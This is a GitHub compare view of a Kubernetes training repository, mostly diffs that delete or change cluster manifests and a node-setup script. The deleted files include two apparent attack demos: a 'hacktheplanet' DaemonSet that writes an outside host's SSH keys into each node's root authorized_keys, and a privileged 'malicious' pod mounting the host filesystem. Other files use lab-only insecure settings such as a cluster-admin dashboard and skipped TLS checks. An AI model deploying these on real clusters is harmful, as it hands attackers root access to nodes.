Compare commits

..

14 Commits

Author SHA1 Message Date
Jerome Petazzoni
99b8886c3e fix-redirects.sh: adding forced redirect 2020-04-07 16:49:49 -05:00
Jerome Petazzoni
13164971ca Re-add builder chapters 2019-01-19 03:58:20 -06:00
Jerome Petazzoni
c55ce66751 Merge branch 'master' into kube-2019-01 2019-01-19 03:57:47 -06:00
Jerome Petazzoni
e1ccad3ee2 Update WiFi information 2019-01-17 01:36:42 -06:00
Jerome Petazzoni
83535c3f69 Update gitter link; opt out of builder demos 2019-01-17 00:47:43 -06:00
Jerome Petazzoni
9ece59e821 Merge branch 'master' into kube-2019-01 2019-01-14 12:01:47 -06:00
Jerome Petazzoni
cd7a5520fb Add WiFi information 2019-01-14 02:13:20 -06:00
Jerome Petazzoni
c1757160d7 Merge branch 'master' into kube-2019-01 2019-01-13 15:15:08 -06:00
Jerome Petazzoni
4f8ffcdd97 Merge branch 'master' into kube-2019-01 2019-01-13 15:13:56 -06:00
Jerome Petazzoni
a66b295d06 Use the 2-day deck 2019-01-13 15:08:01 -06:00
Jerome Petazzoni
ae04e02519 Merge branch 'enixlogo' into kube-2019-01 2019-01-13 15:03:29 -06:00
Jerome Petazzoni
7b03961182 Customization 2019-01-13 15:02:20 -06:00
Jerome Petazzoni
f01bc2a7a9 Fix overlapsing slide number and pics 2018-09-29 18:54:00 -05:00
Jerome Petazzoni
3eaa844c55 Add ENIX logo
Warning: do not merge this branch to your content, otherwise you
will get the ENIX logo in the top right of all your decks
2018-09-08 07:49:38 -05:00
169 changed files with 1926 additions and 34965 deletions

View File

@@ -1,9 +0,0 @@
hostname frr
router bgp 64512
network 1.0.0.2/32
bgp log-neighbor-changes
neighbor kube peer-group
neighbor kube remote-as 64512
neighbor kube route-reflector-client
bgp listen range 0.0.0.0/0 peer-group kube
log stdout

View File

@@ -1,2 +0,0 @@
hostname frr
log stdout

View File

@@ -1,34 +0,0 @@
version: "3"
services:
bgpd:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
restart: always
zebra:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
restart: always
vtysh:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: vtysh -c "show ip bgp"
chmod:
image: alpine
volumes:
- ./run:/var/run/frr
command: chmod 777 /var/run/frr

View File

@@ -1,29 +0,0 @@
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.3.10
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
"Edit the CLUSTER placeholder first. Then, remove this line.":
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-scheduler --master http://localhost:8080

View File

@@ -1,128 +0,0 @@
---
apiVersion: |+
Make sure you update the line with --master=http://X.X.X.X:8080 below.
Then remove this section from this YAML file and try again.
---
apiVersion: v1
kind: ConfigMap
metadata:
name: kube-router-cfg
namespace: kube-system
labels:
tier: node
k8s-app: kube-router
data:
cni-conf.json: |
{
"cniVersion":"0.3.0",
"name":"mynet",
"plugins":[
{
"name":"kubernetes",
"type":"bridge",
"bridge":"kube-bridge",
"isDefaultGateway":true,
"ipam":{
"type":"host-local"
}
}
]
}
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
labels:
k8s-app: kube-router
tier: node
name: kube-router
namespace: kube-system
spec:
template:
metadata:
labels:
k8s-app: kube-router
tier: node
annotations:
scheduler.alpha.kubernetes.io/critical-pod: ''
spec:
serviceAccountName: kube-router
containers:
- name: kube-router
image: docker.io/cloudnativelabs/kube-router
imagePullPolicy: Always
args:
- "--run-router=true"
- "--run-firewall=true"
- "--run-service-proxy=true"
- "--master=http://X.X.X.X:8080"
env:
- name: NODE_NAME
valueFrom:
fieldRef:
fieldPath: spec.nodeName
- name: KUBE_ROUTER_CNI_CONF_FILE
value: /etc/cni/net.d/10-kuberouter.conflist
livenessProbe:
httpGet:
path: /healthz
port: 20244
initialDelaySeconds: 10
periodSeconds: 3
resources:
requests:
cpu: 250m
memory: 250Mi
securityContext:
privileged: true
volumeMounts:
- name: lib-modules
mountPath: /lib/modules
readOnly: true
- name: cni-conf-dir
mountPath: /etc/cni/net.d
initContainers:
- name: install-cni
image: busybox
imagePullPolicy: Always
command:
- /bin/sh
- -c
- set -e -x;
if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
if [ -f /etc/cni/net.d/*.conf ]; then
rm -f /etc/cni/net.d/*.conf;
fi;
TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
cp /etc/kube-router/cni-conf.json ${TMP};
mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
fi
volumeMounts:
- mountPath: /etc/cni/net.d
name: cni-conf-dir
- mountPath: /etc/kube-router
name: kube-router-cfg
hostNetwork: true
tolerations:
- key: CriticalAddonsOnly
operator: Exists
- effect: NoSchedule
key: node-role.kubernetes.io/master
operator: Exists
- effect: NoSchedule
key: node.kubernetes.io/not-ready
operator: Exists
volumes:
- name: lib-modules
hostPath:
path: /lib/modules
- name: cni-conf-dir
hostPath:
path: /etc/cni/net.d
- name: kube-router-cfg
configMap:
name: kube-router-cfg

View File

@@ -1,28 +0,0 @@
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.3.10
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-controller-manager --master http://localhost:8080
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-scheduler --master http://localhost:8080

View File

@@ -72,7 +72,7 @@ spec:
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.4.4"
image: "consul:1.4.0"
args:
- "agent"
- "-bootstrap-expect=3"

View File

@@ -3,6 +3,7 @@ apiVersion: v1
kind: ServiceAccount
metadata:
name: fluentd
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
@@ -18,6 +19,7 @@ rules:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
@@ -31,18 +33,23 @@ subjects:
- kind: ServiceAccount
name: fluentd
namespace: default
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: fluentd
labels:
app: fluentd
k8s-app: fluentd-logging
version: v1
kubernetes.io/cluster-service: "true"
spec:
template:
metadata:
labels:
app: fluentd
k8s-app: fluentd-logging
version: v1
kubernetes.io/cluster-service: "true"
spec:
serviceAccount: fluentd
serviceAccountName: fluentd
@@ -51,7 +58,7 @@ spec:
effect: NoSchedule
containers:
- name: fluentd
image: fluent/fluentd-kubernetes-daemonset:v1.3-debian-elasticsearch-1
image: fluent/fluentd-kubernetes-daemonset:elasticsearch
env:
- name: FLUENT_ELASTICSEARCH_HOST
value: "elasticsearch"
@@ -59,12 +66,14 @@ spec:
value: "9200"
- name: FLUENT_ELASTICSEARCH_SCHEME
value: "http"
# X-Pack Authentication
# =====================
- name: FLUENT_ELASTICSEARCH_USER
value: "elastic"
- name: FLUENT_ELASTICSEARCH_PASSWORD
value: "changeme"
- name: FLUENT_UID
value: "0"
- name: FLUENTD_SYSTEMD_CONF
value: "disable"
- name: FLUENTD_PROMETHEUS_CONF
value: "disable"
resources:
limits:
memory: 200Mi
@@ -85,83 +94,134 @@ spec:
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "1"
creationTimestamp: null
generation: 1
labels:
app: elasticsearch
run: elasticsearch
name: elasticsearch
selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/elasticsearch
spec:
progressDeadlineSeconds: 600
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
app: elasticsearch
run: elasticsearch
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
app: elasticsearch
run: elasticsearch
spec:
containers:
- image: elasticsearch:5
- image: elasticsearch:5.6.8
imagePullPolicy: IfNotPresent
name: elasticsearch
resources:
limits:
memory: 2Gi
requests:
memory: 1Gi
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
env:
- name: ES_JAVA_OPTS
value: "-Xms1g -Xmx1g"
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
---
apiVersion: v1
kind: Service
metadata:
creationTimestamp: null
labels:
app: elasticsearch
run: elasticsearch
name: elasticsearch
selfLink: /api/v1/namespaces/default/services/elasticsearch
spec:
ports:
- port: 9200
protocol: TCP
targetPort: 9200
selector:
app: elasticsearch
run: elasticsearch
sessionAffinity: None
type: ClusterIP
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "1"
creationTimestamp: null
generation: 1
labels:
app: kibana
run: kibana
name: kibana
selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/kibana
spec:
progressDeadlineSeconds: 600
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
app: kibana
run: kibana
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
app: kibana
run: kibana
spec:
containers:
- env:
- name: ELASTICSEARCH_URL
value: http://elasticsearch:9200/
image: kibana:5
image: kibana:5.6.8
imagePullPolicy: Always
name: kibana
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
---
apiVersion: v1
kind: Service
metadata:
creationTimestamp: null
labels:
app: kibana
run: kibana
name: kibana
selfLink: /api/v1/namespaces/default/services/kibana
spec:
externalTrafficPolicy: Cluster
ports:
- port: 5601
protocol: TCP
targetPort: 5601
selector:
app: kibana
run: kibana
sessionAffinity: None
type: NodePort

View File

@@ -1,34 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: hacktheplanet
spec:
selector:
matchLabels:
app: hacktheplanet
template:
metadata:
labels:
app: hacktheplanet
spec:
volumes:
- name: root
hostPath:
path: /root
tolerations:
- effect: NoSchedule
operator: Exists
initContainers:
- name: hacktheplanet
image: alpine
volumeMounts:
- name: root
mountPath: /root
command:
- sh
- -c
- "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
containers:
- name: web
image: nginx

View File

@@ -1,220 +0,0 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Configuration to deploy release version of the Dashboard UI compatible with
# Kubernetes 1.8.
#
# Example usage: kubectl create -f <this_file>
# ------------------- Dashboard Secret ------------------- #
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-certs
namespace: kube-system
type: Opaque
---
# ------------------- Dashboard Service Account ------------------- #
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Role & Role Binding ------------------- #
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
rules:
# Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
- apiGroups: [""]
resources: ["secrets"]
verbs: ["create"]
# Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["create"]
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics from heapster.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard-minimal
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Deployment ------------------- #
kind: Deployment
apiVersion: apps/v1beta2
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
k8s-app: kubernetes-dashboard
template:
metadata:
labels:
k8s-app: kubernetes-dashboard
spec:
containers:
- name: kubernetes-dashboard
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
ports:
- containerPort: 8443
protocol: TCP
args:
- --auto-generate-certificates
# Uncomment the following line to manually specify Kubernetes API server Host
# If not specified, Dashboard will attempt to auto discover the API server and connect
# to it. Uncomment only if the default does not work.
# - --apiserver-host=http://my-address:port
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTPS
path: /
port: 8443
initialDelaySeconds: 30
timeoutSeconds: 30
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
serviceAccountName: kubernetes-dashboard
# Comment the following tolerations if Dashboard must not be deployed on master
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
---
# ------------------- Dashboard Service ------------------- #
kind: Service
apiVersion: v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
ports:
- port: 443
targetPort: 8443
selector:
k8s-app: kubernetes-dashboard
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
labels:
app: dashboard
name: dashboard
spec:
selector:
matchLabels:
app: dashboard
template:
metadata:
labels:
app: dashboard
spec:
containers:
- args:
- sh
- -c
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kube-system:443,verify=0
image: alpine
name: dashboard
---
apiVersion: v1
kind: Service
metadata:
labels:
app: dashboard
name: dashboard
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: dashboard
type: NodePort
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: kubernetes-dashboard
labels:
k8s-app: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system

View File

@@ -1,10 +0,0 @@
apiVersion: v1
Kind: Pod
metadata:
name: hello
namespace: default
spec:
containers:
- name: hello
image: nginx

View File

@@ -1,21 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: malicious
spec:
volumes:
- name: slash
hostPath:
path: /
containers:
- image: alpine
name: alpine
securityContext:
privileged: true
command:
- sleep
- "1000000000"
volumeMounts:
- name: slash
mountPath: /hostfs
restartPolicy: Never

View File

@@ -1,138 +0,0 @@
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: system:aggregated-metrics-reader
labels:
rbac.authorization.k8s.io/aggregate-to-view: "true"
rbac.authorization.k8s.io/aggregate-to-edit: "true"
rbac.authorization.k8s.io/aggregate-to-admin: "true"
rules:
- apiGroups: ["metrics.k8s.io"]
resources: ["pods"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: metrics-server:system:auth-delegator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:auth-delegator
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: RoleBinding
metadata:
name: metrics-server-auth-reader
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: extension-apiserver-authentication-reader
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: apiregistration.k8s.io/v1beta1
kind: APIService
metadata:
name: v1beta1.metrics.k8s.io
spec:
service:
name: metrics-server
namespace: kube-system
group: metrics.k8s.io
version: v1beta1
insecureSkipTLSVerify: true
groupPriorityMinimum: 100
versionPriority: 100
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: metrics-server
namespace: kube-system
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: metrics-server
namespace: kube-system
labels:
k8s-app: metrics-server
spec:
selector:
matchLabels:
k8s-app: metrics-server
template:
metadata:
name: metrics-server
labels:
k8s-app: metrics-server
spec:
serviceAccountName: metrics-server
volumes:
# mount in tmp so we can safely use from-scratch images and/or read-only containers
- name: tmp-dir
emptyDir: {}
containers:
- name: metrics-server
image: k8s.gcr.io/metrics-server-amd64:v0.3.1
imagePullPolicy: Always
volumeMounts:
- name: tmp-dir
mountPath: /tmp
args:
- --kubelet-preferred-address-types=InternalIP
- --kubelet-insecure-tls
- --metric-resolution=5s
---
apiVersion: v1
kind: Service
metadata:
name: metrics-server
namespace: kube-system
labels:
kubernetes.io/name: "Metrics-server"
spec:
selector:
k8s-app: metrics-server
ports:
- port: 443
protocol: TCP
targetPort: 443
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: system:metrics-server
rules:
- apiGroups:
- ""
resources:
- pods
- nodes
- nodes/stats
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: system:metrics-server
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:metrics-server
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system

View File

@@ -1,95 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: consul
rules:
- apiGroups: [ "" ]
resources: [ pods ]
verbs: [ get, list ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: consul
subjects:
- kind: ServiceAccount
name: consul
namespace: orange
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
volumeClaimTemplates:
- metadata:
name: data
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: app
operator: In
values:
- consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.4.4"
volumeMounts:
- name: data
mountPath: /consul/data
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s namespace=orange label_selector=\"app=consul\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command:
- /bin/sh
- -c
- consul leave

View File

@@ -1,39 +0,0 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
name: privileged
annotations:
seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
spec:
privileged: true
allowPrivilegeEscalation: true
allowedCapabilities:
- '*'
volumes:
- '*'
hostNetwork: true
hostPorts:
- min: 0
max: 65535
hostIPC: true
hostPID: true
runAsUser:
rule: 'RunAsAny'
seLinux:
rule: 'RunAsAny'
supplementalGroups:
rule: 'RunAsAny'
fsGroup:
rule: 'RunAsAny'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: psp:privileged
rules:
- apiGroups: ['policy']
resources: ['podsecuritypolicies']
verbs: ['use']
resourceNames: ['privileged']

View File

@@ -1,38 +0,0 @@
---
apiVersion: extensions/v1beta1
kind: PodSecurityPolicy
metadata:
annotations:
apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
name: restricted
spec:
allowPrivilegeEscalation: false
fsGroup:
rule: RunAsAny
runAsUser:
rule: RunAsAny
seLinux:
rule: RunAsAny
supplementalGroups:
rule: RunAsAny
volumes:
- configMap
- emptyDir
- projected
- secret
- downwardAPI
- persistentVolumeClaim
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: psp:restricted
rules:
- apiGroups: ['policy']
resources: ['podsecuritypolicies']
verbs: ['use']
resourceNames: ['restricted']

View File

@@ -1,33 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: jean.doe
namespace: users
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: users:jean.doe
rules:
- apiGroups: [ certificates.k8s.io ]
resources: [ certificatesigningrequests ]
verbs: [ create ]
- apiGroups: [ certificates.k8s.io ]
resourceNames: [ users:jean.doe ]
resources: [ certificatesigningrequests ]
verbs: [ get, create, delete, watch ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: users:jean.doe
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: users:jean.doe
subjects:
- kind: ServiceAccount
name: jean.doe
namespace: users

View File

@@ -1,70 +0,0 @@
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node2
annotations:
node: node2
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node2
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node3
annotations:
node: node3
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node3
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node4
annotations:
node: node4
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node4

View File

@@ -2,7 +2,7 @@ export AWS_DEFAULT_OUTPUT=text
HELP=""
_cmd() {
HELP="$(printf "%s\n%-20s %s\n" "$HELP" "$1" "$2")"
HELP="$(printf "%s\n%-12s %s\n" "$HELP" "$1" "$2")"
}
_cmd help "Show available commands"
@@ -74,10 +74,10 @@ _cmd_deploy() {
pssh -I sudo tee /usr/local/bin/docker-prompt <lib/docker-prompt
pssh sudo chmod +x /usr/local/bin/docker-prompt
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from the first node
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from node1
pssh "
sudo -u docker [ -f /home/docker/.ssh/id_rsa ] ||
ssh -o StrictHostKeyChecking=no \$(cat /etc/name_of_first_node) sudo -u docker tar -C /home/docker -cvf- .ssh |
ssh -o StrictHostKeyChecking=no node1 sudo -u docker tar -C /home/docker -cvf- .ssh |
sudo -u docker tar -C /home/docker -xf-"
# if 'docker@' doesn't appear in /home/docker/.ssh/authorized_keys, copy it there
@@ -86,11 +86,11 @@ _cmd_deploy() {
cat /home/docker/.ssh/id_rsa.pub |
sudo -u docker tee -a /home/docker/.ssh/authorized_keys"
# On the first node, create and deploy TLS certs using Docker Machine
# On node1, create and deploy TLS certs using Docker Machine
# (Currently disabled.)
true || pssh "
if i_am_first_node; then
grep '[0-9]\$' /etc/hosts |
if grep -q node1 /tmp/node; then
grep ' node' /etc/hosts |
xargs -n2 sudo -H -u docker \
docker-machine create -d generic --generic-ssh-user docker --generic-ip-address
fi"
@@ -103,62 +103,11 @@ _cmd_deploy() {
info "$0 cards $TAG"
}
_cmd disabledocker "Stop Docker Engine and don't restart it automatically"
_cmd_disabledocker() {
TAG=$1
need_tag
pssh "sudo systemctl disable docker.service"
pssh "sudo systemctl disable docker.socket"
pssh "sudo systemctl stop docker"
}
_cmd kubebins "Install Kubernetes and CNI binaries but don't start anything"
_cmd_kubebins() {
TAG=$1
need_tag
pssh --timeout 300 "
set -e
cd /usr/local/bin
if ! [ -x etcd ]; then
curl -L https://github.com/etcd-io/etcd/releases/download/v3.3.10/etcd-v3.3.10-linux-amd64.tar.gz \
| sudo tar --strip-components=1 --wildcards -zx '*/etcd' '*/etcdctl'
fi
if ! [ -x hyperkube ]; then
curl -L https://dl.k8s.io/v1.14.1/kubernetes-server-linux-amd64.tar.gz \
| sudo tar --strip-components=3 -zx kubernetes/server/bin/hyperkube
fi
if ! [ -x kubelet ]; then
for BINARY in kubectl kube-apiserver kube-scheduler kube-controller-manager kubelet kube-proxy;
do
sudo ln -s hyperkube \$BINARY
done
fi
sudo mkdir -p /opt/cni/bin
cd /opt/cni/bin
if ! [ -x bridge ]; then
curl -L https://github.com/containernetworking/plugins/releases/download/v0.7.5/cni-plugins-amd64-v0.7.5.tgz \
| sudo tar -zx
fi
"
}
_cmd kube "Setup kubernetes clusters with kubeadm (must be run AFTER deploy)"
_cmd_kube() {
TAG=$1
need_tag
# Optional version, e.g. 1.13.5
KUBEVERSION=$2
if [ "$KUBEVERSION" ]; then
EXTRA_KUBELET="=$KUBEVERSION-00"
EXTRA_KUBEADM="--kubernetes-version=v$KUBEVERSION"
else
EXTRA_KUBELET=""
EXTRA_KUBEADM=""
fi
# Install packages
pssh --timeout 200 "
curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg |
@@ -167,19 +116,19 @@ _cmd_kube() {
sudo tee /etc/apt/sources.list.d/kubernetes.list"
pssh --timeout 200 "
sudo apt-get update -q &&
sudo apt-get install -qy kubelet$EXTRA_KUBELET kubeadm kubectl &&
sudo apt-get install -qy kubelet kubeadm kubectl &&
kubectl completion bash | sudo tee /etc/bash_completion.d/kubectl"
# Initialize kube master
pssh --timeout 200 "
if i_am_first_node && [ ! -f /etc/kubernetes/admin.conf ]; then
if grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/admin.conf ]; then
kubeadm token generate > /tmp/token &&
sudo kubeadm init $EXTRA_KUBEADM --token \$(cat /tmp/token) --apiserver-cert-extra-sans \$(cat /tmp/ipv4)
sudo kubeadm init --token \$(cat /tmp/token)
fi"
# Put kubeconfig in ubuntu's and docker's accounts
pssh "
if i_am_first_node; then
if grep -q node1 /tmp/node; then
sudo mkdir -p \$HOME/.kube /home/docker/.kube &&
sudo cp /etc/kubernetes/admin.conf \$HOME/.kube/config &&
sudo cp /etc/kubernetes/admin.conf /home/docker/.kube/config &&
@@ -189,23 +138,16 @@ _cmd_kube() {
# Install weave as the pod network
pssh "
if i_am_first_node; then
if grep -q node1 /tmp/node; then
kubever=\$(kubectl version | base64 | tr -d '\n') &&
kubectl apply -f https://cloud.weave.works/k8s/net?k8s-version=\$kubever
fi"
# Join the other nodes to the cluster
pssh --timeout 200 "
if ! i_am_first_node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
FIRSTNODE=\$(cat /etc/name_of_first_node) &&
TOKEN=\$(ssh -o StrictHostKeyChecking=no \$FIRSTNODE cat /tmp/token) &&
sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN \$FIRSTNODE:6443
fi"
# Install metrics server
pssh "
if i_am_first_node; then
kubectl apply -f https://raw.githubusercontent.com/jpetazzo/container.training/master/k8s/metrics-server.yaml
if ! grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
TOKEN=\$(ssh -o StrictHostKeyChecking=no node1 cat /tmp/token) &&
sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN node1:6443
fi"
